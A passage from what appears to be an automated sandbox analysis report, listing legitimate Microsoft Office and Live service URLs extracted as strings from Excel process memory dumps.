      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/W
      Source: EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661956196.000000000F7E4000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://officeapps.live.com
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com#
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com.dll
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com/
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com9
      Source: EXCEL.EXE, 00000000.00000003.662023245.000000000F873000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comN
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comT
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comZ
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comb
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comc
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comdlll
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comh
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comq
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.coms
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.coms.dll
      Source: EXCEL.EXE, 00000000.00000002.934018559.000000000DA01000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comt8Jm$
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comw
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks#dR
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesOfficeAddInClassifierOfficeEntitiesUpdated
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiest
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
      Source: EXCEL.EXE, 00000000.00000002.934621206.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654254896.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661747538.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660265666.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652940500.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655880436.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652838684.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.851830559.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778410177.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742911449.000000000E20D000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdatedM
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
      Source: EXCEL.EXE, 00000000.00000002.934621206.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654254896.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661747538.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660265666.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652940500.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655880436.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652838684.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.851830559.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778410177.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742911449.000000000E20D000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities.dll4
      Source: EXCEL.EXE, 00000000.00000002.934621206.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654254896.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661747538.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660265666.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652940500.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655880436.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652838684.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.851830559.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778410177.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742911449.000000000E20D000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://onedrive.live.com
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseqb
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/embed?ioint=
      Source: EXCEL.EXE, 00000000.00000003.652896727.000000000E35C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661357019.000000000E35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660061088.000000000E35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655623912.000000000E35B000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.comOneDriveLogUploadServicehttps://storage.live.com/clientlogs/uploadlocationM
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://osi.office.net
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netst
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://otelrules.azureedge.net
      Source: EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://outlook.office.com
      Source: EXCEL.EXE, 00000000.00000003.742802680.000000000E1B6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661707076.000000000E1B3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656483060.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935840425.000000000F729000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934569051.000000000E1C3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742471357.000000000F729000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.773711564.000000000F729000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660226396.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778360459.000000000E1B5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.852707651.000000000E1C3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652977431.000000000E137000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654190436.000000000E19D000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://outlook.office.com/
      Source: EXCEL.EXE, 00000000.00000003.742853289.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660247505.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654236313.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652925426.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934591120.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778384283.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661726514.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.852724407.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652824432.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655830251.000000000E1DC000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.com2nA
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://outlook.office365.com
      Source: EXCEL.EXE, 00000000.00000003.742802680.000000000E1B6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661707076.000000000E1B3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656483060.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935840425.000000000F729000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934569051.000000000E1C3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742471357.000000000F729000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.773711564.000000000F729000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660226396.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778360459.000000000E1B5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.852707651.000000000E1C3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652977431.000000000E137000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654190436.000000000E19D000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://outlook.office365.com/
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/api/v1.0/me/ActivitiesMBI_SSL
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonB
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonSubstrateOfficeIntelligenceServicehttps:
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=OutlookMBI_SSL_SHORT
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://pages.store.office.com/review/query
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/review/queryTemplateStarthttps://
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspxAwsCgQueryhttps://
      Source: EXCEL.EXE, 00000000.00000003.742853289.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660247505.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654236313.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652925426.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934591120.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778384283.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661726514.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.852724407.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652824432.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655830251.000000000E1DC000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonMBI_SSLpeople.directory.
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonMBI_SSL_SHORTssl.
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl9
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13IdentityServicehttps://identity.
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
